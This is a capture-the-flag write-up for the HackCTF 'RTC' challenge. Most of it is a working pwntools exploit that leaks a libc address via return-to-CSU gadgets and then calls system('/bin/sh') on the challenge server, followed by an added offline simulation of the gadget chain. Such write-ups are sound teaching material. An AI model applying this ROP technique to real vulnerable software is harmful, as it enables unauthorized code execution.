Solving environment: ubuntu 18.04
Intended solution.
The given files are the challenge binary and libc.
Analysis
jiravvit.tistory.com/entry/HackCTF-Pwnable-RTC-%ED%92%80%EC%9D%B4-64bit-ROP
How to exploit
Uses the RTC (Return-to-CSU) technique.
jiravvit.tistory.com/entry/RTC-Return-to-CSU
Let's exploit
Since gadget_2 is only used for the leak, I did not start at the add rsp, 8 but put in the address of the pops that come right after it.
gadget_2 -> csu_init
gadget_1 -> csu_call
It is probably easier to understand if you think of them that way.
```python
from pwn import *

#p = process('./rtc')
p = remote('ctf.j0n9hyun.xyz', 3025)
e = ELF('./rtc')
#libc = e.libc
libc = ELF('./libc.so.6')

write_plt = e.plt['write']
write_got = e.got['write']
read_plt = e.plt['read']
read_got = e.got['read']
main = 0x4005f6
bss = e.bss()

pop_rdi = 0x4006c3
gadget_1 = 0x4006ba # pop rbx, rbp, r12, r13, r14, r15; ret
gadget_2 = 0x4006a0 # mov rdx, r13; mov rsi, r14; mov edi, r15d; call [r12+8*rbx];
                    # add rbx, 1; cmp rbx, rbp; jne (loop); add rsp, 8; pop rbx ... pop r15; ret

# Stage 1: write(1, read_got, 8) through the csu gadgets to leak the libc address of read
payload = b''
payload += b'a' * (0x40 + 0x8)              # buffer + saved rbp
payload += p64(gadget_1)
payload += p64(0)                           # rbx: index into the call table
payload += p64(1)                           # rbp: rbx+1, so the loop runs exactly once
payload += p64(write_got)                   # r12: call [r12+8*rbx] dereferences, so a GOT entry (not PLT) goes here
payload += p64(8) + p64(read_got) + p64(1)  # r13 (rdx = len), r14 (rsi = buf), r15 (edi = fd)
payload += p64(gadget_2)
# after the call: add rsp, 8 plus six pops consume 7 qwords, then ret -> back to main
payload += p64(0) * 7
payload += p64(main)

pause()
p.sendlineafter(b'\n', payload)
read_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#read_addr = u64(p.recv(8))
print(hex(read_addr))
libc_base = read_addr - libc.symbols['read']
print(hex(libc_base))
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

# Stage 2: main runs again; this time ret2libc system("/bin/sh")
payload = b''
payload += b'a' * (0x40 + 0x8)
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(0x400491)                    # ret: keeps the stack 16-byte aligned before system
payload += p64(system)
p.sendlineafter(b'\n', payload)
p.interactive()
```
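To see what the leak chain above actually does before sending it, here is an added example (not part of the original write-up) that models the two csu gadgets in Python and replays the chain's register values; it also goes one step further and shows why rbp must be rbx+1. The gadget and main addresses are the post's; the GOT slot addresses and the libc pointers stored in them are constructed stand-ins.

```python
# Added example (not from the original write-up): a small model of the two
# __libc_csu_init gadgets, so a ret2csu chain can be checked offline.
# Gadget and main addresses are the ones from the post; the GOT slot
# addresses and the libc pointers stored in them are constructed stand-ins.
import struct

GADGET_1 = 0x4006ba   # pop rbx, rbp, r12, r13, r14, r15; ret
GADGET_2 = 0x4006a0   # mov rdx,r13; mov rsi,r14; mov edi,r15d; call [r12+8*rbx]; ...
MAIN = 0x4005f6
WRITE_GOT, READ_GOT = 0x601018, 0x601020                # assumed GOT slots
LIBC_WRITE, LIBC_READ = 0x7ffff7ed1280, 0x7ffff7ed11d0  # constructed GOT contents
GOT = {WRITE_GOT: LIBC_WRITE, READ_GOT: LIBC_READ}

def p64(v):
    return struct.pack('<Q', v)

def build_chain(rbx, rbp, r12, r13, r14, r15, ret_to):
    """Lay the stack out exactly as the write-up does (after the padding)."""
    chain = p64(GADGET_1) + b''.join(p64(v) for v in (rbx, rbp, r12, r13, r14, r15))
    return chain + p64(GADGET_2) + p64(0) * 7 + p64(ret_to)

def simulate_csu(chain, memory, max_calls=8):
    """Run gadget_1 then gadget_2 over `chain` (the stack after the saved RIP).
    Returns (calls, final_rip); each call is (target, edi, rsi, rdx)."""
    words = list(struct.unpack('<%dQ' % (len(chain) // 8), chain))
    sp = 0
    def pop():
        nonlocal sp
        sp += 1
        return words[sp - 1]
    if pop() != GADGET_1:
        raise ValueError('chain must start at the pop gadget')
    rbx, rbp, r12, r13, r14, r15 = (pop() for _ in range(6))
    if pop() != GADGET_2:
        raise ValueError('the pop gadget must return into the call gadget')
    calls = []
    while True:                             # the loop body inside __libc_csu_init
        calls.append((memory.get(r12 + 8 * rbx), r15 & 0xffffffff, r14, r13))
        rbx += 1
        if rbx == rbp:                      # cmp rbx, rbp; jne -> falls through
            break
        if len(calls) >= max_calls:
            raise RuntimeError('rbp is not rbx+1: the loop keeps calling')
    pop()                                   # add rsp, 8
    for _ in range(6):                      # pop rbx ... pop r15 (rest of the 7 zero qwords)
        pop()
    return calls, pop()                     # ret -> main

if __name__ == '__main__':
    print(simulate_csu(build_chain(0, 1, WRITE_GOT, 8, READ_GOT, 1, MAIN), GOT))
```

With the post's values the model reports a single call to the pointer stored at write_got with (edi, rsi, rdx) = (1, read_got, 8) and a final return to main; with rbp = 2 it makes a second call through the next GOT slot, which is why the write-up sets rbp = 1.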